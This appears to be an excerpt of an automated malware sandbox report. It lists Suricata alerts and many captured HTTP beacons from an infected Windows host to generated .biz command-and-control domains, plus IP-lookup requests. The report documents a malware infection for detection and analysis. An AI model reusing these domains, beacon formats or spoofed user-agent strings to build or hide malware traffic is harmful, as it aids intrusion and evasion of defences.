                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.22:49206
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.22:49214
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.22:49195
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.22:49195
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.22:49204
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.22:49204
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49166 -> 193.122.130.0:80
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.22:49196
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.22:49196
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.22:49217
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.22:49217
                  Source: global traffic HTTP traffic detected: POST /crs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 808
                  Source: global traffic HTTP traffic detected: POST /xvuqxulkih HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: POST /bjyjakehonafotkd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: POST /mlvmnwk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: POST /uxiijwub HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: POST /of HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: GET /of?usid=20&utid=14164916598 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
                  Source: global traffic HTTP traffic detected: POST /tbjnflaqienlofab HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: GET /tbjnflaqienlofab?usid=20&utid=14164917114 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
                  Source: global traffic HTTP traffic detected: POST /dcbbaoyhlxdmix HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global traffic HTTP traffic detected: POST /mgjwfjfoigllfjqd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /kieltrnsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /xatwldmnpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /agmftfyaknf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /jy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /vpav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: GET /vpav?usid=20&utid=14164923657 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /wqgsdflawiqut HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: GET /wqgsdflawiqut?usid=20&utid=14164923942 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /mspai HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /savrhhv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /tehaooq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /bqjjhsnkosjso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /rgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /euichtddo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /ka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: POST /bhikwfegywkkepu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: GET /bhikwfegywkkepu?usid=20&utid=14164930459 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /ayokafkcxduc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 814
                  Source: global trafficHTTP traffic detected: GET /ayokafkcxduc?usid=20&utid=14164930640 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /yhhdkvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /fekpygna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /wuwlkmskpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /uknkrwvskelclnbw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /kskvulsy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /gsqrd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /qdy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /qdy?usid=20&utid=14164936400 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /lderrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /lderrm?usid=20&utid=14164936613 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /wua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /ivjxabsxpnamgnu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /dwwujsrodteum HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /fmxntfwxlcjyow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /ekhmfom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /qpqnetyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                  Source: global trafficHTTP traffic detected: POST /tgbpchottuabpqdq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /bcafsfattyjokwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /uihfupcxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /qgbipxbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /cufth HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /nqxton HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /vattrqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /egbl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /njuvyxgvhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /rmrhacpx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
